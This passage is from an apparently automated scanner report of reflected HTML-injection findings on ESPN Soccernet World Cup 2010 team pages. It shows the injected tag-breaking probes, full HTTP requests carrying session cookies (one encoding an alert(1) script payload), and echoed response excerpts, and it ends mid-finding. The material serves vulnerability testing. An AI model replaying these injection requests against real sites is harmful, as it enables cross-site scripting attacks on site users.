Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/448/england
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT Content-Length: 80382 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:24:22 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT Content-Length: 81781 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.74. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/449/netherlands
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:20:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT Content-Length: 81889 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT Content-Length: 81932 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract"> ...[SNIP]...
2.76. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/451/south-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT Content-Length: 82040 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT Content-Length: 82126 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach"> ...[SNIP]...
2.78. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/455/greece
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT Content-Length: 82234 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
